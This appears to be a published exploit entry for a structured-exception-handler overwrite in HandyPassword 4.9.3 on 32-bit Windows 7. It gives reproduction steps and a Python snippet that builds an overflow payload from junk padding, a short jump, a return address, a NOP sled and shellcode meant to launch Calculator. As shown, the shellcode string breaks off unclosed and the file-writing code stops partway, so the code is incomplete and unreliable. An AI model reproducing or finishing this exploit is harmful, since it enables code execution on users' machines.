# Exploit Title: HandyPassword SEH-Over Write Exploit
# Date: 9/24/2015
# Exploit Author: Un_N0n
# Software Link: http://www.handypassword.com/download.shtml
# Version: 4.9.3
# Tested on: Windows 7 x86(32 BIT)
[Steps to Produce the Crash]:
1- open 'HandyPassword.exe'.
2- Then From Menu Goto New Card->Simple Login Form.
3- Click on Create Card, Enter the contents of 'Exploit.txt' Created by script in the Title Field.
4- Enter Short Random value in the rest of the fields.
5- Click on OK
~ Calculator will appear and Software will Crash.
[Code to produce Exploit]:
junk = "A"*1144
nseh = "\xeb\x06\x90\x90" #JMP 6bytes
jmp ="\xB3\x27\x2F\x7F"#0x7f2f27b3 From
nops = "\x90"*50
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
junk2 = "D"*2000
file = open("exploit.txt",'w')